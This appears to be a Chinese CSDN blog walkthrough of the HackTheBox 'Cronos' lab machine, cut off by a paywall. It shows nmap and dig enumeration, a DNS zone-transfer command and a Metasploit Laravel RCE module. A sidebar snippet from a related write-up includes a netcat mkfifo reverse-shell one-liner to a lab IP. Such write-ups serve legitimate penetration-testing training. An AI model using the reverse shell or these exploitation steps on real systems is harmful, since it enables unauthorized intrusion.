HackTheBox:Cronos笔记

最新推荐文章于 2024-05-27 14:14:58 发布
最新推荐文章于 2024-05-27 14:14:58 发布
阅读量1.2k 收藏
点赞数
分类专栏: HTB OSCP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39633874/article/details/105613735
版权
这篇博客详细记录了作者在HackTheBox平台针对Cronos靶机进行渗透测试的过程。首先,通过NMAP扫描发现53端口的DNS服务器,并使用dig和nslookup进行DNS区域传送,揭示了Laravel框架的站点。接着,作者尝试利用Laravel的APP_KEY获取RCE,但因版本不符未能成功。然后,利用DNS域传送漏洞找到了一个后台入口并获得了命令注入的权限。尽管无法直接执行RCE,但作者通过读取文件和密码,尝试反弹shell。最后,文章讨论了提权策略,包括查找suid文件和定时任务,最终成功获取了交互式shell。
摘要由CSDN通过智能技术生成

HackTheBox:Cronos笔记

HackTheBox:Cronos Walkthrough

信息收集

在这里插入图片描述

NMAP

# nmap -sV -sC -Pn -p-  --min-rate 1000 -oA scans\alltcp 10.10.10.13
Nmap scan report for 10.10.10.13
Host is up (1.0s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80端口没东西。。。

在这里插入图片描述

53端口:获得域名

看到有dns服务器,就百度了dig的用法。果然有惊喜,查到了10.10.10.13绑定的域名,绑host后即可访问

# dig @10.10.10.13 -x 10.10.10.13

; <<>> DiG 9.11.5-P4-5.1-Debian <<>> @10.10.10.13 -x 10.10.10.13
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60138
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;13.10.10.10.in-addr.arpa.	IN	PTR

;; ANSWER SECTION:
13.10.10.10.in-addr.arpa. 604800 IN	PTR	ns1.cronos.htb.

;; AUTHORITY SECTION:
10.10.10.in-addr.arpa.	604800	IN	NS	ns1.cronos.htb.

;; ADDITIONAL SECTION:
ns1.cronos.htb.		604800	IN	A	10.10.10.13

;; Query time: 1149 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: 六 418 23:46:32 UTC 2020
;; MSG SIZE  rcvd: 111

上面dig的命令参数,做一下说明

  • @10.10.10.13 :从指定DNS 服务器10.10.10.13上查询
  • -x 10.10.10.13 : 反向查询 IP 地址10.10.10.13对应的域名
  • 还可以在后面追加+short获得精简的结果

根据经验,带ns1的二级域名不太可能是靶机的服务,直接绑定cronos.htb到靶机ip,访问之,图就不放了。

echo "10.10.10.13 cronos.htb" >> /etc/hosts

80端口:Laravel -> DNS Zone Transfer -> Admin

从返回的cookie是laravel_session和页面内容可知,是个用了Laravel框架的PHP站
搜索可用漏洞,找到一个unix/http/laravel_token_unserialize_exec

msf5 exploit(unix/http/laravel_token_unserialize_exec) > show info
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  APP_KEY                     no        The base64 encoded APP_KEY string from the .env file
Description:
  This module exploits a vulnerability in the PHP Laravel Framework 
  for versions 5.5.40, 5.6.x <= 5.6.29. Remote Command Execution is 
  possible via a correctly formatted HTTP X-XSRF-TOKEN header, 
  ... Authentication is not required, 
  however exploitation requires knowledge of the Laravel APP_KEY. 
  ...
  In some cases the APP_KEY is leaked which allows for discovery and exploitation.

果不其然,不填APP_KEY,打失败了,那么最关键的应该是这句话

however exploitation requires knowledge of the Laravel APP_KEY.

猜测流程就是要读取到Laravel的配置文件.env,得到APP_KEY,进而打RCE拿shell的过程
好吧,我尝试爆目录、爆文件泄漏,浏览一个小时无果。。。
结果一看表哥们的过关wp:域传送漏洞。(其实我看到53端口就想到这个漏洞了,只不过记不住命令(懒得搜),就没验证

域传送漏洞

在windows下使用nslookup指令
在kali下使用dig指令
在kali或者是BT5下使用nmap,dnswalk,dnsenum这三种工具

dig

dig @10.10.10.13 -t AXFR cronos.htb 

; <<>> DiG 9.11.5-P4-5.1-Debian <<>> @10.10.10.13 -t AXFR cronos.htb
; (<
最低0.47元/天 解锁文章
故莫轻言
关注
专栏目录
hackthebox-cronos(考点:dns/sql注入/crontab)
冬萍子癸水
04-11 372
nmap 看到53端口就应该想到dns,在/etc/hosts/里加上10.10.10.13 cronos.htb 然后再打开80,进入 cronos.htb。看看网页。以及dirbuster扫,但都没什么有价值的信息。 没啥突破口啊。继续信息搜集。 看来针对端口53,还要再利用 dig axfr @10.10.10.13 cronos.htb host -l cronos.htb 10.10...
Cronos -- hack the box
neal1991的专栏
03-15 365
IntroductionTarget machine: 10.10.10.13(OS: linux)Kali linux: 10.10.16.44EnumerationF...
Hack the box靶机 cronos
菜浪马废的博客
05-19 407
添加10.10.10.13 cronos.htb 到/etc/hosts 同样添加到/etc/hosts 访问一下 直接绕过了 一看就是远程命令执行 抓包 确认完毕 上nc 10.10.14.8 && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.118 1234 >/tmp/f root用户在运行artisan 写个PHP脚本 替换它 然后连接 我用的php-rever.
HackTheBox::Cronos
aya3t的博客
10-10 102
HackTheBox::Cronos
HackTheBox | Cronos
Purpose_7的博客
03-17 213
HackTheBox | Cornos
Management-CRONOS:CRONOS的模块
05-05
CRONOS是一款强大的任务调度和管理系统,其设计目标是帮助用户自动化执行一系列定时任务,比如数据备份、系统维护、报告生成等。在这个“Management-CRONOS: CRONOS的模块”主题中,我们将深入探讨CRONOS的核心组件...
Cronos:功能齐全的.NET库,用于处理Cron表达式。 牢记时区,直观地处理夏时制转换
02-05
Cronos是一个.NET库,用于解析Cron表达式并计算下一次出现。 它是设计时考虑时区,并直观地处理(又名夏令时)转换为* nix中的Cron。 请注意,该库不包含任何任务/作业计划程序,仅适用于Cron表达式。 支持带有可...
Cron:Cron API
05-06
该库使您只有一个常规的crontab条目,它将触发可通过该库定义的多个不同的cronjob。 Cron库将决定作业是否需要运行。 注意:确保将服务器crontab作业设置为正确选择的频率,因为例如,如果在代码中定义了一个cron...
HackTheBox-Machines--Cronos
最新发布
七天
05-27 474
Cronos 测试过程。
Cronos 2.04 预测软件
11-20
这是一个完整的时间序列分析软件包.支持各种不同的模式,包括ARMA及GARCH模型.
cronosparser:CronosPro CronosPlus 数据库文件的解析器
05-30
cronosparser 地位 截至 2020 年末, cronosparser已在以下方面cronosparser破坏: cronosparser只成功解码了我们拥有的大约 20-30% 的数据库,并且只有使用 Cronos 3 生成的数据库。 对于这个问题,我们很乐意收到解决这些问题的拉取请求。 我们目前没有时间表或计划自己解决问题。 关于cronosparser 该存储库包含一些 WIP 代码,用于对俄语 CronosPro/CronosPlus 数据库系统使用的 Cronos 数据库文件进行逆向工程,以及一些示例数据库。 功能缺失 可以绕过密码保护吗? 参考
【Hack The Box】linux练习-- Cronos
人间体佐菲的博客
11-09 210
【Hack The Box】linux练习-- Cronos
HackTheBox - Cronos Write Up
ak.Gh0st的博客
04-03 233
HackTheBox - Cronos Write Up
No.97-HackTheBox-Linux-Cronos-Walkthrough渗透学习
qq_34801745的博客
05-14 329
** HackTheBox-Linux-Cronos-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/11 靶机难度:中级(4.5/10) 靶机发布日期:2017年10月13日 靶机描述: CronOS focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world
htb-cronos
m0_55772907的博客
09-16 674
htb
HTB-Cronos
TA不懒,但还没有添加简介
12-06 594
HTB-Cronos
HTB靶场系列 linux靶机 靶机cronos
m0_57221101的博客
01-19 1752
勘探 基本操作先用nmap扫一下 nmap 10.10.10.13 Starting Nmap 7.80 (https://nmap.org) at 2020-04-07 21:01 EDT Nmap scan report for 10.10.10.13 Host is up (0.014s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain ..
oscp——HTB——Cronos
王嘟嘟的博客
06-02 434
0x00 前言 0x01 信息收集 0x02 Web——Webshell 这里开放了80端口,发现80端口没啥东西,扫目录也没扫出来啥。 看到开放了53端口,知道是开启了dns服务 使用nslookup nslookup server 10.10.10.13 10.10.10.13 这类可以看到10.10.10.13的相对应的域名 查看一下其他的域名 dig axfr cronos.htb @10.10.10.13 这里可以看到还有其他的域 测试admin.cronos.htb,发现这里是一个
Quartz作业调度:Cron表达式详解
"Quartz_cron表达式是用于在Quartz作业调度中定义时间规则的机制,它基于类似于Linux下的Cron表达式。Cron表达式由6或7个时间字段组成,每个字段分别代表秒、分钟、小时、日期、月份、星期,以及可选的年份。每个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值